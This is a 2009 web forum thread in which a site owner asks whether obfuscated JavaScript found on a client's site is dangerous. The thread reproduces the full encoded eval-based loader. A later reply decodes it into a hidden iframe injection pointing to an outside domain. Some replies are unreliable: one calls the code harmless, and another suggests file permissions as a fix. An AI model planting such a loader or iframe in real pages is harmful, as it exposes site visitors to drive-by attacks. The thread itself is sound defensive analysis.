Mutley Posted March 25, 2009 Share Posted March 25, 2009 Suspecious code on a clients site, anything I should know? Seems encoded. function qthnib3b23(x){var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,46,25,11,61,60,8,58,44,43,0,0,0,0,0,0,18,48,26,29,54,1,24,19,45,5,49,34,28,15,22,38,6,59,56,16,42,32,2,51,17,3,57,0,0,0,0,9,0,41,7,23,47,27,14,13,31,37,30,52,33,0,62,20,10,40,53,12,36,55,39,21,4,50,35);for(g=Math.ceil(y/c);g>0;g--){q='';for(z=Math.min(y,c);z>0;z--,y--){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(234^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}qthnib3b23('Cf6lfNFvxvav37Zv2jCW1N6lMDLkfNFKhjRzx7_JCKZUjnqAge4UsKZKbnqyx1RlMjCKBu4upv_O_jgyV7avBVCJIdqzfjLKI@qvM@qvbWRUP7ZzF@5UxyFlIQ2JwuLAv1qvV@sOIn_lfp5a37aUxzZKx7Flbp5Amdgu@zCuYbLW_TCuhuLAgz8yCfqzjpRrFdCDp3RzYDqUjjCuG9LOjfalMjgyffFOBBRKGVglI@Rz6GHrIM6zF1RlM@CWYY')</script> Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/ Share on other sites More sharing options...
darkfreaks Posted March 25, 2009 Share Posted March 25, 2009 its not encoded its javascript functions from what i can tell it outputs text or numbers, i wouldnt consider it "dangerious" unless somehow its trying to take information from your site. Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793840 Share on other sites More sharing options...
Mchl Posted March 25, 2009 Share Posted March 25, 2009 If you don't know where it came from, at least comment it out. [edit] It seems there's some more javascript encoded in this code, that tries to execute itself. Probably some malicious stuff. Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793862 Share on other sites More sharing options...
darkfreaks Posted March 25, 2009 Share Posted March 25, 2009 that is what i was thinking commenting out works and giving it proper chmod permissions. Edit: if you give file permission of 744 it gives the owner read,write and execute permission and gives everyone else read only permission Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793886 Share on other sites More sharing options...
Mchl Posted March 25, 2009 Share Posted March 25, 2009 chmod? what for? it would execute on user's browser anyway probably inserting an iframe to some malicious site. I tried to display the code to be evaluated, but did not manage... always sucked in JS Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793889 Share on other sites More sharing options...
darkfreaks Posted March 25, 2009 Share Posted March 25, 2009 not if the code was removed and the file had read only permission for everyone but the owner of the file Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793902 Share on other sites More sharing options...
Mchl Posted March 25, 2009 Share Posted March 25, 2009 No way! So the code will not run if you remove it? Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793905 Share on other sites More sharing options...
Maq Posted March 25, 2009 Share Posted March 25, 2009 not if the code was removed and the file had read only permission for everyone but the owner of the file What's the point of that? Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793908 Share on other sites More sharing options...
Mchl Posted March 25, 2009 Share Posted March 25, 2009 That's what it does window.status='Done'; document.write('<iframe name=c075 src="http://add-content-filter.info/t/?'+Math.round(Math.random()*16827)+'c075'+'" width=213 height=79 style="display:none"></iframe> Quote Link to comment https://forums.phpfreaks.com/topic/151108-is-this-dangerous/#findComment-793913 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.